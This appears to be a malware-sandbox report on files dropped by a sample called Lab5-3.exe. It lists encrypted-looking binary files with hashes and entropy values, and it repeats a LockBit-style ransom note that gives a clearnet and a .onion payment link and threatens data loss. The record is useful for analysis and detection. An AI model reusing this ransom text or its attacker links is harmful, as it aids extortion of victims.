                                                                                                          Preview:..!.......%......'..g.=)3..^g...s...~...TXq%..C`8.2&0.8.%.Y...I...............e....4G..-.fR.R..G..........'M%...3......AM.Gc.a%..,.].k.J.0X/%wc.1..(.x...S.y..}}+...d......K.~.=...#.)...q....c.t....N.=#..5.T...r.!...7^.T..h.N0.k.X..G../m.&Vt.Lq.....O....bQ..7g.L.B.^.t4...`...z.wC.|[.%..Z.....'...Y7..O.-...../.k...}.......^i....h..J....wn.......[Z......>H...M...+...r...`...(.G!..8..Fn........'..Ad......w~h.cbK....T...r.@o....T|..g.p....8L....b.*.5.J3....<*,.4.b.X.$.F.k'!.P.iz~.].\m..&6&~\7x$..v....;.%..cz.I....X.d.Y..~.m=#(5.b..2..^..L..._D`.._y ....,.=.Z'H..-...xm.99>...Yn...U..<.I.pZ..u..&.P...$C.x...{..#O.$...S...\..?.B...348.0..{u... b.jOk...Wf.Y................ER.V".s`..i*..#..>a.P....U.R_.....6.0y..=..nf....[.?.(..]u.....j...-....^w..m[.9.,%.\..6`Y......'..l_.i..8.....#.s5...q.K..x...r.x....i0...q......Yzb.R....+2....k....0=|..@......-0...|G.....).'.O.L......).,.....?.....W9..ZiG..w`8.D..S..|:*......b.x.^....Lg..m..b..m....`k.mO
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5120
                                                                                                          Entropy (8bit):7.962536892930553
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:pahYQFdriqM6eriCUI/nstUq0n0l+DCBxWny7bGx0uKeY2ElUJ:pa+YR3eULV7o0Cb
                                                                                                          MD5:C32925E07CAACC70F80AE66DA54C682E
                                                                                                          SHA1:48D5DB908B62E90D81C39B382A1FAF87D3368332
                                                                                                          SHA-256:F0A0C643234F8C00195CE5FA05D661F5656C464088E4A10D33803ACE7D70E9F0
                                                                                                          SHA-512:29179CF8BB57404A325E9787239E7F8DF6090949F363F493907AEFA85FEE45836CACD71E098F3FF925519B0F440EA3B716F71201B46B1638689B6B552DFD0699
                                                                                                          Malicious:false
                                                                                                          Preview:...."f..)...J..%..>.}_...R.I.q...t>{;P..Q3.#............`Luc...a.{.j7...?.r'.W...C:.]....;...\.4.M.l..p...o.\.@.4.1...../a.W@0.0...`......%cuY......,..dc..eDr.70#...!...)../R.!.T..S.....C...b7.....F...k....[~.Y...."CO.hb.F....?.W.b..0.....]+...fq4<wv..8.w.O.....Y4.u.+..X6?.p^3..@..v..dy..\K.,T.|..-..Gi.y..jLN...c....".v...nk9u..K.]..-..7.*.A.W.......m2.W99....).E..7[g.....}.(..h....H.z...m.1...4.RRv.].1..{../..K!.J.D ..W..S$=b.}..9k+...9.....K.....C....J...C..^.3.Zi.....>..}.jV.....Y.i?FH.D.F...O...p...x...k..~m.L^.....8.8...........6...e.c:.Y_@....9...Tc.... k......AN....n6"..>j,...T....Oh.*#j.b.S......... ..1..*s.w.}.....I..)x....K....G..5b.. ...].....L.I?...A&..E=2......].....mK_...>...!..H3ay..._.8...//.1{.G..}.q....#..M......Gd..t..]uE..|N...?.y%.Et..Fk.|Jk8Lr.....L..A..~...\...m|.....U..... .K6k....T.]...3kt...W...l8......0........(._..oP2.X.Ip.;.........=^4B...I....A..o.....XBM...c... ....|j..F...1I.taa.........az...F.".
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5008
                                                                                                          Entropy (8bit):7.962743904153389
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:kElHya3rl0vF7vK8BIDd/SYwV+fAf7l8Gx0uKeY2ElUJ:ktXF7iGIDFLwmGP0Cb
                                                                                                          MD5:F62982005A0297ED5B52D6A3C7729F04
                                                                                                          SHA1:8C17EED43DCD72A2D554B0F65913253BE47F1834
                                                                                                          SHA-256:89A21129CB8EEC5DEB558D5EC865A242E8776C11785567A59BC41440F80200C1
                                                                                                          SHA-512:5B802685CD4E3AF3E1A5C6A40269B12A42941463FC2187C658BF5EBB5CCBEF646D1C776F1AF1C8C4B450710F59732A59D01FD509CADA48AB25C6B59C6705B781
                                                                                                          Malicious:false
                                                                                                          Preview:.@.....0....w..O....) w.d\3..Vn:.z'w..P...-l..Ae..2...F(..........%....j..9.l.j.9..A.n.r/H....>c....*...c....:..e....5[...B.g...Zs.,qu.....q..K..~f^..j.Z..+..zT...5.A.e....F..P.(...._q..TV..(:.......z.Q....4.......F...?'_.5.3F.(g..0qr.e....[...yo..{..8.....u.....<$!..,..cy.......A..[6..........;R.g..........u...._....O........P...EiM....w..9....?,.U.......s*.>.8.9.....j.%.........+..Jx....6>..B2+..g..1.?x.w..*vK.........G..2..s&T.?>.Mcs.....^.p8...}H..".L...}A...Q...7#@.dC..a.......A..n...y....#.._..].:......+,....N...........eZ.`./h.*..m..k.S.1.8..v@...&..+V.I.....N'y0...cH...N.....qyM.=.l....m..@........Y....?...Wn.A..].o.......D...2P............_pC6.f".-......i0.T~.B...."..M=B..8.d..(.....d.<.S...2..j.....M.0.u.h.{........h."$.e...a...q.U.W.6N...0. @..(.ZA..Gq\.8Q.!.!.V4.Jo......:Ti..j.C)...............T\m......7.~........'.Sw..W.4..P...............Q...,..DQ.y......].1..J.].d..."Q`.....4e8DE.w.>h...%.zAJ..G0.O8./..7J^in.+
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5120
                                                                                                          Entropy (8bit):7.964008719863125
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:IhhOWcu2AHs1P4dQxZHq49seaDE8GBzVFvNnx8lGx0uKeY2ElUJ:IvOWcu/enbHVseZ8+xD0Cb
                                                                                                          MD5:2205CB4FC7BACEB7C50E346D09C5287E
                                                                                                          SHA1:35BA24248BB1502B2DD922691FDC847A5F1C2710
                                                                                                          SHA-256:B1CE2CA9E3B22B029BBFD5E8DA5CE8FA5CB4EC0E271D01CD515E0E43D4748853
                                                                                                          SHA-512:15418B6007C9749CB3C8A760C3127199AD320467C401794F7D7635BA6D3B225CFFE93785A8C8243971941E2DB2266E07BFCCF18B4785E3DC7ECB719ED0F20ECF
                                                                                                          Malicious:false
                                                                                                          Preview:z....B..bu.{....:.L....Wv.B.Q...........~up....<3.Q.%..<....I...].N*..H*..$..9t(YER..c](Q.......gM[.E_....~|..^Vv?..Y.].v..s.d....5....KS`..N.-.o9G..CA]..;D.[...\..8W=S.HXw.......D9......(.rP.....R....J:....|..Q.f7..M*.......J/1...rJ2..J.C-Yk.-..a..f.hJ.....u.A..T...\hb@....dJ....G..yo..<Y!.-....H..)...HqS.<..K'.q9.$...Y.....U..W...<,O...4....U.w.|.ZW...|.<.l?.Y...Ub.lgq,.T.....Z.3=...dH.....H.p.a.P...j.....@.......z.'....m.c'..Q.....H.....|yg..NH...1..5......=...8..X.!..uBG..o.....A..up`I.....#&..)/-.Z.{..;.~....9..^g.?...p....oW2.K.].......'..{hl..n...0..`OJ:.A..Q.Q...pkK....p?......$*.B1..9}..DQ*...4..h..8.......VI.n.M.D....l@...XT...i....kt.."..kF.),:o.|7..\2).~S..$w.{$.E.......$.1k.T...G..0.3.H/..'.-Hr..s}...t..G<./w..J .P...@}.7.x.sg.*+...(.:..z...A.S..XC....$..Z..q..-..!.....$ ..E^.k...E/..]>.A...:..G.{.{]y....nt.W..L.E..../..g..l.K.K..K.O..F6.....s..........H..K....R...4...w.p.....A.}."..P..?.=....I.:..S.%qi.>tSn5...*...*....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5344
                                                                                                          Entropy (8bit):7.969270047708658
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:AfaGX6QY0lHjbfygQ/Ee+K08QlIC53rqK8/Oz8QicHwB9p0eZDSyMheSGx0uKeYO:2vRTNjmye+XnRD8/y8Qi7B91Ka0Cb
                                                                                                          MD5:91455B46E6BCDDD84396870F6858B419
                                                                                                          SHA1:CBD14A6B291FAC6FB5BCF9AF55657E1722FA40CE
                                                                                                          SHA-256:FE771296D7CDAAF85DEF1FB09D70A7FD4FE22C410510892ADD377B3AB5454942
                                                                                                          SHA-512:293B8DF863599934B3D9F1724718971CE9AD11BA48A74911EF4D66AE99CDBFFFDCEA0E98886C6D294872071875732FBC9DE0A22CB9A184945BC373D1B02CECA4
                                                                                                          Malicious:false
                                                                                                          Preview:An...y...X..L.uc<@.n....%N..>..#Mz.j.ts..%.N.x..q...LX.....i..f......".B...$..s~v...t#.O..%......u%H.....L..<'.D6M........}sZ ..&..F.".k2........}.V|F-{...sG....50.c;~....h:...H..8.!...t..%..j.yW...>.V].f.._/3.h../.....7."_.-<..65a.PJd..~.........].v......I.$.b.c....Q...B@.......6.....v..i}%GA....O.(}.... ..n..m.o..*.q.[.E.....j.{.........ZA...\.:..5.:..N.....6C/..q..6Nh.."ov.>...HFx......(.d............!D)..(Z.c.}..hc....[7s?.Z.Am.u.E.v..(.'.!{./.o,.t.S.....h..,<..A.b..=.n,Z.i.a....p.u.n.k]Q9S\..`.70.......m...NG....k.Ca=).k...Z#...B..U.?.K.m..!V...#....b...YF.b..x.....^x.G@.E..J.yN..O..B.?.........@.....-l..S.......2.G^.s.......k_x..*/C....F^..4L2!.h..e.L....1o...((,I..@.J...H{^..b.I.......'.1.%B..O..1.$:.v.....r..x..4[.:..'......x.+....+..v,B...R|..qA.DC....0.....,qrJ.#j.Mv.9P.k`g*$.`.._.Q.P..;.h..hD...v.0....r^.c.p..G....]Lt.5E....U(.t].o.*'.....7>c..j......Z...,..|...h.&..!....;....5D....J......W.-..D6.+...rIE.1."%.X.1..........
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5328
                                                                                                          Entropy (8bit):7.96579273542082
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ZuU+82PI10D/JiPvG/XLk7fw3fAK4Ya0SkFeGPYdfQ/Q+dGx0uKeY2ElUJ:gs23D/IPvGPafwlV3e8QgQ30Cb
                                                                                                          MD5:CA3CC132413B9E6A51BE845651B72681
                                                                                                          SHA1:0D438DF55700883D55744422ED4C2648FAE4F647
                                                                                                          SHA-256:D150407606B6EF58A8CF1A6DF17620B821DDA53C0103592634D0D8BC2846DBF6
                                                                                                          SHA-512:C3730C695EE4C671E5749E08A02DAEE2CAA3006B15F36F6B3E6899622144C6894F38A0D30841F5FD4B48F85FE24EC6F95CFC4F6361F8F2A597161EEA33E62E6C
                                                                                                          Malicious:false
                                                                                                          Preview:.5._SY.../....z<..5.K..#1...N~.z...r....4...d.nzL.b.Ke...5..7...;M.........3...r.X....:..'k.....%zD....].@..g....P.z&...Ua...,..c.h.....<.HzS;..#9.:s..q]!.'..C .Yu....^....:..Gh\*.=e.....d..^.7yR...;..K...`.&..By..Uk..^C...KRr.;e..<.H.PF....,Z...G.(.....wI..I....f.0.x........U...yQ...1.P/.......q.7.M.y..Xh^...s..+..H.RO.J.?....tV\....\..DI..A:$.....)C...*N....E..x..9....5..;2gB\}.O.N@.....p...f.\.kU..W.!O..E.?.j.7f>..\(.'.ik#O.(.X?m.v..j..1D~.9Px.....z......zi)cj.......{XW".......F.c...`Bs.|..MD.$.].......@...q.%.6.j.k7..G:..D...kt..v..C.^...X.}s...\.D[.z...z......;./.?...MOt4...z.....H....}H.|. .fY.A..#.pv.0.:....F...........\......Eh.....B[@<.....g.>...!.HP...B4z..76 .P7.Y, ..i..Y....5=.=i..g.v#...{K...9.a.:...P.I`.k'."m...^.t.....;(.K...T...3...R...J.SZ.g.....L........W.,G..2.H`..%v....M..vAG1.....1Z,......~..W...L.....r.2).bE|...:...ea..-o..a}"R..#g....f..MX.p..._..$.~...`f.Lh.....W.........M...-...h.....M[...h.Q....F.....[..k
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5136
                                                                                                          Entropy (8bit):7.961149415846945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:/8cfYBfzTc/eCCHXbTKC5GK5jou2rcPtdlxpsUKGx0uKeY2ElUJ:/MctCaC8qoutVdNsUZ0Cb
                                                                                                          MD5:D6CCD54CC2615381B9E00AEE6952FFAB
                                                                                                          SHA1:F1CDAD4D7950EB66351E149B4FAAB11B8015657A
                                                                                                          SHA-256:C1E78EAAB90B3D91CBFE6EA1446516D797A920B835DBB80AA4368BD96CC2C410
                                                                                                          SHA-512:0EE740CBF475069058E26C1F73A3261B4881542185276A79D751D8A2FFD1811877008926F9F2FDC5810D2AC596B3AFA68677AA0D3DC6858B529FE93262D55633
                                                                                                          Malicious:false
                                                                                                          Preview:+..`.......9.E......ZT1..$..:'...Y........*..G...R...2.'.Aew.kF..@.q.....z.>.9.....=...I,....v....$...V......<.\...$8.$.5....V......}U..h.ji.I-....S...a.K..&x...Y.U5'0..Uy....._.d?..S...:`2wj.....^..Mo.o\x.......7....W......uo..*...;..F...q...c..(.M.R."6.@tZ....M. ......G.S.t....R.pU?....?3..2|..8.B.'U...1..f.!...*..~@..c.\....>....;P.q.....|..w.j.>G.:...W#.7.*l.=_.;<...7.;xp.......?.;........7..L...+..K.en=W ...E;..|..d."mX.b.H.uE....iz.X...&...dd..)..x....._*..^!....C..........|.a........#...#..O.j5'..^6......S......Duu....e8_[.......`.....*.E....{.-.....z;......K-.T....c.._e..o.5?r(7.....l...2..'2.....*...Pl...D^....8.......Zjo.^.|..eS.....|. .)....z..z3Q...A........../.y..;Oe1.6.#.......C.'......2P.. ...Q...T..g_N...j.G=..|../...Y..9.^.....o7....Cr..qko.U.........\.....}.I..]..$#..d..f.\...M&.|.%......R.5^Q..z.3....^..T..h........h;1,......<.....qp.o~NKk..U1rM_.R.0..R.6...W.qo..G.`.d:..R.%.d..2..[......`23-.,.x.tA/EG7..4...B.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5408
                                                                                                          Entropy (8bit):7.961337945812459
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:cKtH9rnkB8uQck3AcTwuNQn4+FUtuX8V5uA41E/5H8pGx0uKeY2ElUJ:cKtH9wuuNk3TwuC4+FlX2ubS0Cb
                                                                                                          MD5:C5D5059C92B40D30BFE02031BE5481CD
                                                                                                          SHA1:943EBE59E81034203728E8337DD9A56C70341D0F
                                                                                                          SHA-256:2372A82E43D5E64C7F229A1F08E2B4A8DEBAB24E5ABBF667A6460D8BC7593FC8
                                                                                                          SHA-512:A91627F982E2909F3C9FB107C0CF0B8E92D218BF65AEE6BBB6A8DA94D1812A2F88940C845AF97EA7B5DF1A14CA78E0024E92D50737B318502EE862D352A97303
                                                                                                          Malicious:false
                                                                                                          Preview:.S.....Pq.........QA.pY.n..T.(`..\...CD....G.L..T...K..).$.<{..1.mV.*...G.]QL..J..H!..,....r...-.?..4L.1<%.e<...B~t.lj..[]..7y..q.8........2...#i8.....(....{6...j].......a.v/..].....+..d..3:,.XIB.....M..|0..).q.Sax.........9=...Hh_.L......4..0.2..S6...4.^....;H.vM.L..F.k..C....}H~.!..cJ......+.y.|0P.;OCW@6..N..o......x..".(QQh..k...C.=.%...(....`S...E~.3.%.;.....^...~.'.....m.`#.{^z..:......>.1.....RMvm....T..V.r..~.\f.W..F....v.W.n....9.F...>"( ....+....S.../...,i8...c.)......8.\....j...A'...@"..`T!\.k.G.M..,f.|"...&.-..m._.[...b..Am.....u<S'-......Q.......... I....Q........K.....mu. .U.*.3..K..TW...Z.V.p.51c...*.=.=....C}..rOm..l&....?..1...-s.j3D.(.g>....$....X......6.?.<....?...u|..2..(.5.l....2...U.......IE3.6.?.L.gJ.pw$._GI@..)....=.....#vMq2....X....|q.c.......9..0.....E\4....|n.[..3/.r..l.hq.]U.S.v..j3..P.u.......K..A18.x..hZ...J./.,.."!NK.J...h.n.....4yl..{f}UK..].h.....x..;Cu].../...*^.Q..1H..:.....y.i.:..LS....c..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
